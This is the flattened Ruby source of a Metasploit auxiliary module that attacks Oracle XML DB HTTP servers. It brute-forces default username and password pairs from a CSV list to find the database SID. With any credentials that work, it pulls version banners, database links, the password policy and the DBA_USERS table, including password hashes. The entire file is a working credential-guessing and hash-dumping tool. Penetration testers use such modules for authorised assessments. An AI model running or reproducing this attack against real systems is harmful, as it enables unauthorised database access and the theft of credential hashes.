## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'Oracle XML DB SID Discovery via Brute Force', 'Description' => %q{ This module attempts to retrieve the sid from the Oracle XML DB httpd server, utilizing Pete Finnigan's default oracle password list. }, 'References' => [ [ 'URL', 'http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf' ], [ 'URL', 'http://www.petefinnigan.com/default/oracle_default_passwords.csv'], ], 'Author' => [ 'nebulus' ], 'License' => MSF_LICENSE ) register_options( [ OptString.new('CSVFILE', [ false, 'The file that contains a list of default accounts.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'oracle_default_passwords.csv')]), Opt::RPORT(8080), ], self.class) deregister_options('DBUSER','DBPASS') end def run_host(ip) begin res = send_request_raw({ 'uri' => '/oradb/PUBLIC/GLOBAL_NAME', 'version' => '1.0', 'method' => 'GET' }, 5) return if not res if(res.code == 200) vprint_status("http://#{ip}:#{datastore['RPORT']}/oradb/PUBLIC/GLOBAL_NAME (#{res.code}) is not password protected.") return elsif(res.code == 403 || res.code == 401) print_status("http://#{ip}:#{datastore['RPORT']}/oradb/PUBLIC/GLOBAL_NAME (#{res.code})") end list = datastore['CSVFILE'] users = [] fd = CSV.foreach(list) do |brute| datastore['DBUSER'] = brute[2].downcase datastore['DBPASS'] = brute[3].downcase user_pass = "#{datastore['DBUSER']}:#{datastore['DBPASS']}" res = send_request_raw({ 'uri' => '/oradb/PUBLIC/GLOBAL_NAME', 'version' => '1.0', 'method' => 'GET', 'headers' => { 'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}" } }, 10) if( not res ) vprint_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{datastore['DBUSER']} / #{datastore['DBPASS']}...") next end if (res.code == 200) if (not res.body.length > 0) # sometimes weird bug where body doesn't have value yet res.body = res.bufq end sid = res.body.scan(/(\S+)<\/GLOBAL_NAME>/)[0] report_note( :host => ip, :proto => 'tcp', :port => datastore['RPORT'], :type => 'SERVICE_NAME', :data => sid, :update => :unique_data ) print_good("Discovered SID: '#{sid[0]}' for host #{ip}:#{datastore['RPORT']} with #{datastore['DBUSER']} / #{datastore['DBPASS']}") users.push(user_pass) else vprint_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{datastore['DBUSER']} / #{datastore['DBPASS']}...") end end #fd.each good = false users.each do |user_pass| (u,p) = user_pass.split(':') # get versions res = send_request_raw({ 'uri' => '/oradb/PUBLIC/PRODUCT_COMPONENT_VERSION', 'version' => '1.1', 'method' => 'GET', 'headers' => { 'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}" } }, -1) if(res) if(res.code == 200) if (not res.body.length > 0) # sometimes weird bug where body doesn't have value yet res.body = res.bufq end doc = REXML::Document.new(res.body) print_good("Version Information ==> as #{u}") doc.elements.each('PRODUCT_COMPONENT_VERSION/ROW') do |e| p = e.elements['PRODUCT'].get_text v = e.elements['VERSION'].get_text s = e.elements['STATUS'].get_text report_note( :host => datastore['RHOST'], :sname => 'xdb', :proto => 'tcp', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Component Version: #{p}#{v}", :update => :unique_data ) print_good("\t#{p}\t\t#{v}\t(#{s})") end end end # More version information res = send_request_raw({ 'uri' => '/oradb/PUBLIC/ALL_REGISTRY_BANNERS', 'version' => '1.1', 'method' => 'GET', 'headers' => { 'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}" } }, -1) if(res) if(res.code == 200) if (not res.body.length > 0) # sometimes weird bug where body doesn't have value yet res.body = res.bufq end doc = REXML::Document.new(res.body) doc.elements.each('ALL_REGISTRY_BANNERS/ROW') do |e| next if e.elements['BANNER'] == nil b = e.elements['BANNER'].get_text report_note( :host => datastore['RHOST'], :proto => 'tcp', :sname => 'xdb', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Component Version: #{b}", :update => :unique_data ) print_good("\t#{b}") end end end #database links res = send_request_raw({ 'uri' => '/oradb/PUBLIC/ALL_DB_LINKS', 'version' => '1.1', 'method' => 'GET', 'headers' => { 'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}" } }, -1) if(res) if(res.code == 200) if (not res.body.length > 0) # sometimes weird bug where body doesn't have value yet res.body = res.bufq end doc = REXML::Document.new(res.body) print_good("Database Link Information ==> as #{u}") doc.elements.each('ALL_DB_LINKS/ROW') do |e| next if(e.elements['HOST'] == nil or e.elements['USERNAME'] == nil or e.elements['DB_LINK'] == nil) h = e.elements['HOST'].get_text d = e.elements['DB_LINK'].get_text us = e.elements['USERNAME'].get_text sid = h.to_s.scan(/\(SID\s\=\s(\S+)\)\)\)/)[0] if(h.to_s.match(/^\(DESCRIPTION/) ) h = h.to_s.scan(/\(HOST\s\=\s(\S+)\)\(/)[0] end if(sid and sid != "") print_good("\tLink: #{d}\t#{us}\@#{h[0]}/#{sid[0]}") report_note( :host => h[0], :proto => 'tcp', :port => datastore['RPORT'], :sname => 'xdb', :type => 'oracle_sid', :data => sid, :update => :unique_data ) else print_good("\tLink: #{d}\t#{us}\@#{h}") end end end end # get users res = send_request_raw({ 'uri' => '/oradb/PUBLIC/DBA_USERS', 'version' => '1.1', 'method' => 'GET', 'read_max_data' => (1024*1024*10), 'headers' => { 'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}" } }, -1) if res and res.code == 200 if (not res.body.length > 0) # sometimes weird bug where body doesn't have value yet res.body = res.bufq end doc = REXML::Document.new(res.body) print_good("Username/Hashes on #{ip}:#{datastore['RPORT']} ==> as #{u}") doc.elements.each('DBA_USERS/ROW') do |user| us = user.elements['USERNAME'].get_text h = user.elements['PASSWORD'].get_text as = user.elements['ACCOUNT_STATUS'].get_text print_good("\t#{us}:#{h}:#{as}") good = true if(as.to_s == "OPEN") report_note( :host => datastore['RHOST'], :proto => 'tcp', :sname => 'xdb', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Active Account #{u}:#{h}:#{as}", :update => :unique_data ) else report_note( :host => datastore['RHOST'], :proto => 'tcp', :sname => 'xdb', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Disabled Account #{u}:#{h}:#{as}", :update => :unique_data ) end end end # get password information res = send_request_raw({ 'uri' => '/oradb/PUBLIC/USER_PASSWORD_LIMITS', 'version' => '1.1', 'method' => 'GET', 'read_max_data' => (1024*1024*10), 'headers' => { 'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}" } }, -1) if res and res.code == 200 if (not res.body.length > 0) # sometimes weird bug where body doesn't have value yet res.body = res.bufq end doc = REXML::Document.new(res.body) print_good("Password Policy ==> as #{u}") fla=plit=pgt=prt=prm=plot='' doc.elements.each('USER_PASSWORD_LIMITS/ROW') do |e| next if e.elements['RESOURCE_NAME'] == nil case when(e.elements['RESOURCE_NAME'].get_text == 'FAILED_LOGIN_ATTEMPTS') fla = e.elements['LIMIT'].get_text when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_LIFE_TIME') plit = e.elements['LIMIT'].get_text when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_REUSE_TIME') prt = e.elements['LIMIT'].get_text when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_REUSE_MAX') prm = e.elements['LIMIT'].get_text when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_LOCK_TIME') plot = e.elements['LIMIT'].get_text when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_GRACE_TIME') pgt = e.elements['LIMIT'].get_text end end print_good( "\tFailed Login Attempts: #{fla}\n\t" + "Password Life Time: #{plit}\n\t" + "Password Reuse Time: #{prt}\n\t" + "Password Reuse Max: #{prm}\n\t" + "Password Lock Time: #{plot}\n\t" + "Password Grace Time: #{pgt}" ) report_note( :host => datastore['RHOST'], :proto => 'tcp', :sname => 'xdb', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Maximum Reuse Time: #{prm}", :update => :unique_data ) report_note( :host => datastore['RHOST'], :proto => 'tcp', :sname => 'xdb', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Reuse Time: #{prt}", :update => :unique_data ) report_note( :host => datastore['RHOST'], :proto => 'tcp', :sname => 'xdb', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Life Time: #{plit}", :update => :unique_data ) report_note( :host => datastore['RHOST'], :proto => 'tcp', :sname => 'xdb', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account Fail Logins Permitted: #{fla}", :update => :unique_data ) report_note( :host => datastore['RHOST'], :proto => 'tcp', :sname => 'xdb', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account Lockout Time: #{plot}", :update => :unique_data ) report_note( :host => datastore['RHOST'], :proto => 'tcp', :sname => 'xdb', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account Password Grace Time: #{pgt}", :update => :unique_data ) end break if good end # users.each rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end end end